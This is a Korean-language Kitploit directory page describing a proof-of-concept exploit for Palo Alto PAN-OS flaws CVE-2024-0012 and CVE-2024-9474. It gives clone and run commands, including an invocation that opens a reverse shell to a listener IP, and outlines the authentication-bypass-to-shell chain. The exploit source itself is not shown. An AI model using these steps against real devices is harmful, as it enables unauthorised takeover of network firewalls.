Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — 이 PoC는 Palo Alto PAN-OS의 취약점, 특히 CVE-2024-0012 및 CVE-2024-9474를 대상으로 합니다. 이 스크립트는 페이로드 생성, 청크 전송 및 원활한 명령 실행을 포함한 익스플로잇 과정을 자동화합니다. | Kitploit
도구/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

이 PoC는 Palo Alto PAN-OS의 취약점, 특히 CVE-2024-0012 및 CVE-2024-9474를 대상으로 합니다. 이 스크립트는 페이로드 생성, 청크 전송 및 원활한 명령 실행을 포함한 익스플로잇 과정을 자동화합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
851년 전아직 검토되지 않음

🚀 CVE-2024-0012 & CVE-2024-9474 (Palo Alto PAN-OS) 익스플로잇 🔐

Palo Alto PAN-OS Exploit Type

🛡️ 설명

이 PoC(Proof-of-Concept) 스크립트는 Palo Alto PAN-OS의 취약점, 특히 CVE-2024-0012 및 CVE-2024-9474를 대상으로 하며, 인증 우회, 페이로드 생성, 청크 전송, 원활한 명령 실행 등 익스플로잇 과정을 자동화합니다.

⚠️ 이 스크립트는 교육 및 공인된 침투 테스트 목적으로만 사용됩니다. 무단 사용은 불법입니다.


🔍 대상 취약점

CVE-2024-0012

  • 유형: 인증 우회
  • 영향: 관리 인터페이스에 대한 무단 액세스를 가능하게 합니다.
  • 심각도: 🚨 치명적

CVE-2024-9474

  • 유형: 명령 실행 및 권한 상승
  • 영향: 원격 공격자가 임의의 명령을 실행할 수 있도록 합니다.
  • 심각도: 🔥 중간

🧑‍💻 사용법

🛠️ 저장소 클론

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 스크립트 실행

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

인수:

  • <TARGET_URL>: 대상 URL (http 또는 https 포함)
  • <LISTENER_IP>: 리버스 셸 리스너용 IP 주소
  • <LISTENER_PORT>: 리버스 셸 리스너용 포트

💡 예시

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 익스플로잇 데모

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ 작동 방식

이 PoC에 대한 전체 분석 및 기술적 통찰력은 이 Medium 글에서 확인하세요!

  1. 🔍 취약점 확인: 대상이 CVE-2024-0012 및 CVE-2024-9474에 취약한지 확인합니다.
  2. 🛡️ PHPSESSID 추출: 추가 익스플로잇을 위한 세션 ID를 검색합니다.
  3. ✨ 페이로드 생성: 이중 인코딩된 리버스 셸 페이로드를 생성합니다.
  4. 📦 청크 업로드: 페이로드 청크를 대상 서버로 전송합니다.
  5. 🔗 페이로드 결합: 대상 시스템에서 페이로드를 재구성합니다.
  6. ⚡ 명령 실행: 리버스 셸을 디코딩하고 실행합니다.

⚠️ 법적 고지

이 PoC는 교육 목적 및 공인된 보안 테스트만을 위한 것입니다. 이 도구의 무단 사용은 엄격히 금지됩니다. 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.


🧑‍🎓 저자

ghostxploiter

도구 다운로드